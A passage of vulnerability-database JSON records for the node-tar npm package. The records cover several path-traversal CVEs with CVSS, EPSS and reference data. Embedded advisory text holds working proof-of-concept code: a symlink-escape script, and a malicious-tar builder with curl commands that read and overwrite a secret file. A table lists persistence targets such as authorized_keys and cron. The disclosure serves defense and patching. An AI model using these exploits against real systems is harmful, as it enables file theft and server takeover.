extraction root but linked to an external file. The PoC confirms shared inode and successful read+write via `exfil`.\n\n### PoC\n[hardlink.js](https://github.com/user-attachments/files/25240082/hardlink.js)\nEnvironment used for validation:\n\n- Node: `v25.4.0`\n- tar: `7.5.7`\n- OS: macOS Darwin 25.2.0\n- Extract options: defaults (`tar.extract({ file, cwd })`)\n\nSteps:\n\n1. Prepare/locate a `tar` module. If `require('tar')` is not available locally, set `TAR_MODULE` to an absolute path to a tar package directory.\n\n2. Run:\n\n```bash\nTAR_MODULE=\"$(cd '../tar-audit-setuid - CVE/node_modules/tar' && pwd)\" node hardlink.js\n```\n\n3. Expected vulnerable output (key lines):\n\n```text\nsame_inode=true\nread_ok=true\nwrite_ok=true\nresult=VULNERABLE\n```\n\nInterpretation:\n\n- `same_inode=true`: extracted `exfil` and external secret are the same file object.\n- `read_ok=true`: reading `exfil` leaks external content.\n- `write_ok=true`: writing `exfil` modifies external file.\n\n### Impact\nVulnerability type:\n\n- Arbitrary file read/write via archive extraction path confusion and link resolution.\n\nWho is impacted:\n\n- Any application/service that extracts attacker-controlled tar archives with Node `tar` defaults.\n- Impact scope is the privileges of the extracting process user.\n\nPotential outcomes:\n\n- Read sensitive files reachable by the process user.\n- Overwrite writable files outside extraction root.\n- Escalate impact depending on deployment context (keys, configs, scripts, app data).", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-26960.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-26960.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-26960", "reference_id": "", "reference_type": "", "scores": [ { "value": "5e-05", "scoring_system": "epss", "scoring_elements": "0.00263", "published_at": "2026-04-02T12:55:00Z" }, { "value": "7e-05", "scoring_system": "epss", "scoring_elements": "0.00512", "published_at": "2026-04-13T12:55:00Z" }, { "value": "7e-05", "scoring_system": "epss", "scoring_elements": "0.00513", "published_at": "2026-04-18T12:55:00Z" }, { "value": "7e-05", "scoring_system": "epss", "scoring_elements": "0.00517", "published_at": "2026-04-07T12:55:00Z" }, { "value": "7e-05", "scoring_system": "epss", "scoring_elements": "0.00518", "published_at": "2026-04-04T12:55:00Z" }, { "value": "7e-05", "scoring_system": "epss", "scoring_elements": "0.00509", "published_at": "2026-04-16T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-26960" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26960", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26960" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/isaacs/node-tar", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/isaacs/node-tar" }, { "reference_url": "https://github.com/isaacs/node-tar/commit/2cb1120bcefe28d7ecc719b41441ade59c52e384", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-02-20T15:29:17Z/" } ], "url": "https://github.com/isaacs/node-tar/commit/2cb1120bcefe28d7ecc719b41441ade59c52e384" }, { "reference_url": "https://github.com/isaacs/node-tar/commit/d18e4e1f846f4ddddc153b0f536a19c050e7499f", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-02-20T15:29:17Z/" } ], "url": "https://github.com/isaacs/node-tar/commit/d18e4e1f846f4ddddc153b0f536a19c050e7499f" }, { "reference_url": "https://github.com/isaacs/node-tar/security/advisories/GHSA-83g3-92jg-28cx", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-02-20T15:29:17Z/" } ], "url": "https://github.com/isaacs/node-tar/security/advisories/GHSA-83g3-92jg-28cx" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26960", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26960" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1129378", "reference_id": "1129378", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1129378" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2441253", "reference_id": "2441253", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2441253" }, { "reference_url": "https://github.com/advisories/GHSA-83g3-92jg-28cx", "reference_id": "GHSA-83g3-92jg-28cx", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-83g3-92jg-28cx" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:5447", "reference_id": "RHSA-2026:5447", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:5447" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:6192", "reference_id": "RHSA-2026:6192", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:6192" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:6428", "reference_id": "RHSA-2026:6428", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:6428" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/62803?format=api", "purl": "pkg:npm/tar@7.5.8", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-bj4b-gq5e-2kfy" }, { "vulnerability": "VCID-qunt-xms1-a3cc" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/tar@7.5.8" } ], "aliases": [ "CVE-2026-26960", "GHSA-83g3-92jg-28cx" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-jj22-rfbv-bkg3" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/11154?format=api", "vulnerability_id": "VCID-m4hj-dq8q-67f6", "summary": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')\nThe npm package \"tar\" (aka node-tar) has an arbitrary file creation/overwrite and arbitrary code execution vulnerability. node-tar aims to guarantee that any file whose location would be outside of the extraction target directory is not extracted.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-37713.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-37713.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2021-37713", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00316", "scoring_system": "epss", "scoring_elements": "0.54626", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00316", "scoring_system": "epss", "scoring_elements": "0.54649", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00316", "scoring_system": "epss", "scoring_elements": "0.54671", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00316", "scoring_system": "epss", "scoring_elements": "0.54687", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00316", "scoring_system": "epss", "scoring_elements": "0.54674", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00316", "scoring_system": "epss", "scoring_elements": "0.54678", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00316", "scoring_system": "epss", "scoring_elements": "0.54563", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00316", "scoring_system": "epss", "scoring_elements": "0.54656", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00316", "scoring_system": "epss", "scoring_elements": "0.54633", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00316", "scoring_system": "epss", "scoring_elements": "0.54689", "published_at": "2026-04-18T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2021-37713" }, { "reference_url": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/isaacs/node-tar/commit/52b09e309bcae0c741a7eb79a17ef36e7828b946", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/isaacs/node-tar/commit/52b09e309bcae0c741a7eb79a17ef36e7828b946" }, { "reference_url": "https://github.com/isaacs/node-tar/commit/82eac952f7c10765969ed464e549375854b26edc", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/isaacs/node-tar/commit/82eac952f7c10765969ed464e549375854b26edc" }, { "reference_url": "https://github.com/isaacs/node-tar/commit/875a37e3ec031186fc6599f6807341f56c584598", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/isaacs/node-tar/commit/875a37e3ec031186fc6599f6807341f56c584598" }, { "reference_url": "https://github.com/npm/node-tar", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/npm/node-tar" }, { "reference_url": "https://www.npmjs.com/package/tar", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://www.npmjs.com/package/tar" }, { "reference_url": "https://www.oracle.com/security-alerts/cpuoct2021.html", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2033394", "reference_id": "2033394", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2033394" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2021-37713", "reference_id": "CVE-2021-37713", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-37713" }, { "reference_url": "https://github.com/advisories/GHSA-5955-9wpr-37jh", "reference_id": "GHSA-5955-9wpr-37jh", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-5955-9wpr-37jh" }, { "reference_url": "https://github.com/npm/node-tar/security/advisories/GHSA-5955-9wpr-37jh", "reference_id": "GHSA-5955-9wpr-37jh", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/npm/node-tar/security/advisories/GHSA-5955-9wpr-37jh" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/39221?format=api", "purl": "pkg:npm/tar@6.1.9", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-5wr3-7131-u3aa" }, { "vulnerability": "VCID-bj4b-gq5e-2kfy" }, { "vulnerability": "VCID-fqmy-jhdk-xfhw" }, { "vulnerability": "VCID-jj22-rfbv-bkg3" }, { "vulnerability": "VCID-qunt-xms1-a3cc" }, { "vulnerability": "VCID-xqpk-t1d2-yqak" }, { "vulnerability": "VCID-yy79-dbn9-7bd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/tar@6.1.9" } ], "aliases": [ "CVE-2021-37713", "GHSA-5955-9wpr-37jh" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-m4hj-dq8q-67f6" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/24011?format=api", "vulnerability_id": "VCID-qunt-xms1-a3cc", "summary": "node-tar Symlink Path Traversal via Drive-Relative Linkpath\n### Summary\n`tar` (npm) can be tricked into creating a symlink that points outside the extraction directory by using a drive-relative symlink target such as `C:../../../target.txt`, which enables file overwrite outside `cwd` during normal `tar.x()` extraction.\n\n### Details\nThe extraction logic in `Unpack[STRIPABSOLUTEPATH]` validates `..` segments against a resolved path that still uses the original drive-relative value, and only afterwards rewrites the stored `linkpath` to the stripped value.\n\nWhat happens with `linkpath: \"C:../../../target.txt\"`:\n1. `stripAbsolutePath()` removes `C:` and rewrites the value to `../../../target.txt`.\n2. The escape check resolves using the original pre-stripped value, so it is treated as in-bounds and accepted.\n3. Symlink creation uses the rewritten value (`../../../target.txt`) from nested path `a/b/l`.\n4. Writing through the extracted symlink overwrites the outside file (`../target.txt`).\n\nThis is reachable in standard usage (`tar.x({ cwd, file })`) when extracting attacker-controlled tar archives.\n\n### PoC\nTested on Arch Linux with `tar@7.5.10`.\n\nPoC script (`poc.cjs`):\n\n```js\nconst fs = require('fs')\nconst path = require('path')\nconst { Header, x } = require('tar')\n\nconst cwd = process.cwd()\nconst target = path.resolve(cwd, '..', 'target.txt')\nconst tarFile = path.join(cwd, 'poc.tar')\n\nfs.writeFileSync(target, 'ORIGINAL\\n')\n\nconst b = Buffer.alloc(1536)\nnew Header({\n path: 'a/b/l',\n type: 'SymbolicLink',\n linkpath: 'C:../../../target.txt',\n}).encode(b, 0)\nfs.writeFileSync(tarFile, b)\n\nx({ cwd, file: tarFile }).then(() => {\n fs.writeFileSync(path.join(cwd, 'a/b/l'), 'PWNED\\n')\n process.stdout.write(fs.readFileSync(target, 'utf8'))\n})\n```\n\nRun:\n\n```bash\nnode poc.cjs && readlink a/b/l && ls -l a/b/l ../target.txt\n```\n\nObserved output:\n\n```text\nPWNED\n../../../target.txt\nlrwxrwxrwx - joshuavr 7 Mar 18:37 a/b/l -> ../../../target.txt\n.rw-r--r-- 6 joshuavr 7 Mar 18:37 ../target.txt\n```\n\n`PWNED` confirms outside file content overwrite. `readlink` and `ls -l` confirm the extracted symlink points outside the extraction directory.\n\n### Impact\nThis is an arbitrary file overwrite primitive outside the intended extraction root, with the permissions of the process performing extraction.\n\nRealistic scenarios:\n- CLI tools unpacking untrusted tarballs into a working directory\n- build/update pipelines consuming third-party archives\n- services that import user-supplied tar files", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-31802.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.2", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-31802.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-31802", "reference_id": "", "reference_type": "", "scores": [ { "value": "7e-05", "scoring_system": "epss", "scoring_elements": "0.00467", "published_at": "2026-04-09T12:55:00Z" }, { "value": "7e-05", "scoring_system": "epss", "scoring_elements": "0.0047", "published_at": "2026-04-08T12:55:00Z" }, { "value": "7e-05", "scoring_system": "epss", "scoring_elements": "0.00472", "published_at": "2026-04-07T12:55:00Z" }, { "value": "7e-05", "scoring_system": "epss", "scoring_elements": "0.00477", "published_at": "2026-04-04T12:55:00Z" }, { "value": "7e-05", "scoring_system": "epss", "scoring_elements": "0.00481", "published_at": "2026-04-02T12:55:00Z" }, { "value": "8e-05", "scoring_system": "epss", "scoring_elements": "0.00663", "published_at": "2026-04-18T12:55:00Z" }, { "value": "8e-05", "scoring_system": "epss", "scoring_elements": "0.00671", "published_at": "2026-04-11T12:55:00Z" }, { "value": "8e-05", "scoring_system": "epss", "scoring_elements": "0.00664", "published_at": "2026-04-12T12:55:00Z" }, { "value": "8e-05", "scoring_system": "epss", "scoring_elements": "0.00665", "published_at": "2026-04-13T12:55:00Z" }, { "value": "8e-05", "scoring_system": "epss", "scoring_elements": "0.00658", "published_at": "2026-04-16T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-31802" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-31802", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-31802" }, { "reference_url": "https://github.com/isaacs/node-tar", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:H/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/isaacs/node-tar" }, { "reference_url": "https://github.com/isaacs/node-tar/commit/f48b5fa3b7985ddab96dc0f2125a4ffc9911b6ad", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:H/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-10T14:56:31Z/" } ], "url": "https://github.com/isaacs/node-tar/commit/f48b5fa3b7985ddab96dc0f2125a4ffc9911b6ad" }, { "reference_url": "https://github.com/isaacs/node-tar/security/advisories/GHSA-9ppj-qmqm-q256", "reference_id": "", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "8.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:H/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-10T14:56:31Z/" } ], "url": "https://github.com/isaacs/node-tar/security/advisories/GHSA-9ppj-qmqm-q256" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-31802", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:H/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-31802" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445881", "reference_id": "2445881", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445881" }, { "reference_url": "https://github.com/advisories/GHSA-9ppj-qmqm-q256", "reference_id": "GHSA-9ppj-qmqm-q256", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-9ppj-qmqm-q256" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/67069?format=api", "purl": "pkg:npm/tar@7.5.11", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/tar@7.5.11" } ], "aliases": [ "CVE-2026-31802", "GHSA-9ppj-qmqm-q256" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-qunt-xms1-a3cc" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/20118?format=api", "vulnerability_id": "VCID-xqpk-t1d2-yqak", "summary": "node-tar Vulnerable to Arbitrary File Creation/Overwrite via Hardlink Path Traversal\n### Summary\nnode-tar contains a vulnerability where the security check for hardlink entries uses different path resolution semantics than the actual hardlink creation logic. This mismatch allows an attacker to craft a malicious TAR archive that bypasses path traversal protections and creates hardlinks to arbitrary files outside the extraction directory.\n\n### Details\nThe vulnerability exists in `lib/unpack.js`. When extracting a hardlink, two functions handle the linkpath differently:\n\n**Security check in `[STRIPABSOLUTEPATH]`:**\n```javascript\nconst entryDir = path.posix.dirname(entry.path);\nconst resolved = path.posix.normalize(path.posix.join(entryDir, linkpath));\nif (resolved.startsWith('../')) { /* block */ }\n```\n\n**Hardlink creation in `[HARDLINK]`:**\n```javascript\nconst linkpath = path.resolve(this.cwd, entry.linkpath);\nfs.linkSync(linkpath, dest);\n```\n\n**Example:** An application extracts a TAR using `tar.extract({ cwd: '/var/app/uploads/' })`. The TAR contains entry `a/b/c/d/x` as a hardlink to `../../../../etc/passwd`.\n\n- **Security check** resolves the linkpath relative to the entry's parent directory: `a/b/c/d/ + ../../../../etc/passwd` = `etc/passwd`. No `../` prefix, so it **passes**.\n\n- **Hardlink creation** resolves the linkpath relative to the extraction directory (`this.cwd`): `/var/app/uploads/ + ../../../../etc/passwd` = `/etc/passwd`. This **escapes** to the system's `/etc/passwd`.\n\nThe security check and hardlink creation use different starting points (entry directory `a/b/c/d/` vs extraction directory `/var/app/uploads/`), so the same linkpath can pass validation but still escape. The deeper the entry path, the more levels an attacker can escape.\n\n### PoC\n#### Setup\n\nCreate a new directory with these files:\n\n```\npoc/\n├── package.json\n├── secret.txt ← sensitive file (target)\n├── server.js ← vulnerable server\n├── create-malicious-tar.js\n├── verify.js\n└── uploads/ ← created automatically by server.js\n └── (extracted files go here)\n```\n\n**package.json**\n```json\n{ \"dependencies\": { \"tar\": \"^7.5.0\" } }\n```\n\n**secret.txt** (sensitive file outside uploads/)\n```\nDATABASE_PASSWORD=supersecret123\n```\n\n**server.js** (vulnerable file upload server)\n```javascript\nconst http = require('http');\nconst fs = require('fs');\nconst path = require('path');\nconst tar = require('tar');\n\nconst PORT = 3000;\nconst UPLOAD_DIR = path.join(__dirname, 'uploads');\nfs.mkdirSync(UPLOAD_DIR, { recursive: true });\n\nhttp.createServer((req, res) => {\n if (req.method === 'POST' && req.url === '/upload') {\n const chunks = [];\n req.on('data', c => chunks.push(c));\n req.on('end', async () => {\n fs.writeFileSync(path.join(UPLOAD_DIR, 'upload.tar'), Buffer.concat(chunks));\n await tar.extract({ file: path.join(UPLOAD_DIR, 'upload.tar'), cwd: UPLOAD_DIR });\n res.end('Extracted\\n');\n });\n } else if (req.method === 'GET' && req.url === '/read') {\n // Simulates app serving extracted files (e.g., file download, static assets)\n const targetPath = path.join(UPLOAD_DIR, 'd', 'x');\n if (fs.existsSync(targetPath)) {\n res.end(fs.readFileSync(targetPath));\n } else {\n res.end('File not found\\n');\n }\n } else if (req.method === 'POST' && req.url === '/write') {\n // Simulates app writing to extracted file (e.g., config update, log append)\n const chunks = [];\n req.on('data', c => chunks.push(c));\n req.on('end', () => {\n const targetPath = path.join(UPLOAD_DIR, 'd', 'x');\n if (fs.existsSync(targetPath)) {\n fs.writeFileSync(targetPath, Buffer.concat(chunks));\n res.end('Written\\n');\n } else {\n res.end('File not found\\n');\n }\n });\n } else {\n res.end('POST /upload, GET /read, or POST /write\\n');\n }\n}).listen(PORT, () => console.log(`http://localhost:${PORT}`));\n```\n\n**create-malicious-tar.js** (attacker creates exploit TAR)\n```javascript\nconst fs = require('fs');\n\nfunction tarHeader(name, type, linkpath = '', size = 0) {\n const b = Buffer.alloc(512, 0);\n b.write(name, 0); b.write('0000644', 100); b.write('0000000', 108);\n b.write('0000000', 116); b.write(size.toString(8).padStart(11, '0'), 124);\n b.write(Math.floor(Date.now()/1000).toString(8).padStart(11, '0'), 136);\n b.write(' ', 148);\n b[156] = type === 'dir' ? 53 : type === 'link' ? 49 : 48;\n if (linkpath) b.write(linkpath, 157);\n b.write('ustar\\x00', 257); b.write('00', 263);\n let sum = 0; for (let i = 0; i < 512; i++) sum += b[i];\n b.write(sum.toString(8).padStart(6, '0') + '\\x00 ', 148);\n return b;\n}\n\n// Hardlink escapes to parent directory's secret.txt\nfs.writeFileSync('malicious.tar', Buffer.concat([\n tarHeader('d/', 'dir'),\n tarHeader('d/x', 'link', '../secret.txt'),\n Buffer.alloc(1024)\n]));\nconsole.log('Created malicious.tar');\n```\n\n#### Run\n\n```bash\n# Setup\nnpm install\necho \"DATABASE_PASSWORD=supersecret123\" > secret.txt\n\n# Terminal 1: Start server\nnode server.js\n\n# Terminal 2: Execute attack\nnode create-malicious-tar.js\ncurl -X POST --data-binary @malicious.tar http://localhost:3000/upload\n\n# READ ATTACK: Steal secret.txt content via the hardlink\ncurl http://localhost:3000/read\n# Returns: DATABASE_PASSWORD=supersecret123\n\n# WRITE ATTACK: Overwrite secret.txt through the hardlink\ncurl -X POST -d \"PWNED\" http://localhost:3000/write\n\n# Confirm secret.txt was modified\ncat secret.txt\n```\n### Impact\n\nAn attacker can craft a malicious TAR archive that, when extracted by an application using node-tar, creates hardlinks that escape the extraction directory. This enables:\n\n**Immediate (Read Attack):** If the application serves extracted files, attacker can read any file readable by the process.\n\n**Conditional (Write Attack):** If the application later writes to the hardlink path, it modifies the target file outside the extraction directory.\n\n### Remote Code Execution / Server Takeover\n\n| Attack Vector | Target File | Result |\n|--------------|-------------|--------|\n| SSH Access | `~/.ssh/authorized_keys` | Direct shell access to server |\n| Cron Backdoor | `/etc/cron.d/*`, `~/.crontab` | Persistent code execution |\n| Shell RC Files | `~/.bashrc`, `~/.profile` | Code execution on user login |\n| Web App Backdoor | Application `.js`, `.php`, `.py` files | Immediate RCE via web requests |\n| Systemd Services | `/etc/systemd/system/*.service` | Code execution on service restart |\n| User Creation | `/etc/passwd` (if running as root) | Add new privileged user |\n\n## Data Exfiltration & Corruption\n\n1. **Overwrite arbitrary files** via hardlink escape + subsequent write operations\n2. **Read sensitive files** by creating hardlinks that point outside extraction directory\n3. **Corrupt databases** and application state\n4. **Steal credentials** from config files, 